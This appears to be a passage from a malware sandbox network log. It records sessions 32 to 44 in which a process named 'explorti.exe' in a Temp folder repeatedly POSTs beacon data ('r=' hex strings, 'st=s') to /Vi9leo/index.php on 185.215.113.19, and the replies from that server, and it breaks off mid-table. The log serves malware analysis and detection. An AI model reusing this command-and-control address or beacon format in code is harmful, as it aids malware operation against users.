Sep 1, 2024 06:28:41.417254925 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:41.664150953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49780	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:41.783376932 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:42.526021004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:42.526803017 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:42.774656057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49781	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:42.894831896 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:43.637886047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:43.638506889 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:43.894241095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49782	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:44.013478041 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:44.752712965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:44.755294085 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:45.003441095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49783	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:45.113584995 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:45.888034105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:45.889009953 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:46.142879009 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49784	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:46.254019976 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:47.022620916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:47.030585051 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:47.281999111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49785	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:47.397701979 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:48.138727903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:48.139640093 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:48.387382984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49786	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:48.502799988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:49.246798992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:49.247585058 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:49.516973972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49788	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:49.707221031 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:50.519002914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:50.519695997 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:50.799293995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49789	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:50.911807060 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:51.860822916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:51.863588095 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:52.111486912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49790	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:52.221076965 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:52.964426041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:52.965269089 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:53.213671923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49791	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:53.330219984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:54.071852922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:54.107136011 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:54.356739998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49792	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:54.476560116 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:55.219294071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:55.220325947 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:55.466128111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49793	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
